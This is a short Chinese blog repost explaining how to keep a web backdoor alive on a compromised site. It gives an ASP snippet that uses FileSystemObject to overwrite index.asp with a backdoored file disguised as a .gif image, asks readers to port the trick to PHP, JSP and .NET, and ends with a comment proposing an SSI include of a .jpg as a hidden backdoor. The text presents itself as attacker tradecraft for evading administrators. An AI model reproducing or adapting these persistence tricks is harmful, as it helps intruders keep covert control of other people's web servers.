转载自:http://hi.baidu.com/micropoor

//2011-11-15 星期二
// 管理员的思维:
查找asp,php,jsp,.net脚本文件关键词
//我们的思维:
<%  
Set fso = CreateObject("Scripting.FileSystemObject")    
sFile = Server.Mappath("/index.asp")   
Set objFile = fso.GetFile(sFile)    
if  objFile.attributes <> 32 then:objFile.attributes = 32:end if   
fso.CopyFile Server.Mappath("/images/Micropoor.gif"),Server.Mappath("/index.asp")
%>
 
//一箭双雕:
那么我们可不可以把它作为index.php的还原精灵呢?它不仅仅是后门,更是我们的影子系统。
 
//课后题:
聪明的你,一定会把它演变成PHP,JSP,.NET等

    结论:站在“敌人”的角度考虑,往往你就是赢家。

站长评论:

这种没用的,早已经将 FSO 组件作为关键词了。

而且手法也相当古老了,只能蒙混小白。

并且很多机器 FSO 早卸载了,后门需要支持的东西越少越好。

还不如:

<!--#include file="image/fuck.jpg"-->

更爽一些。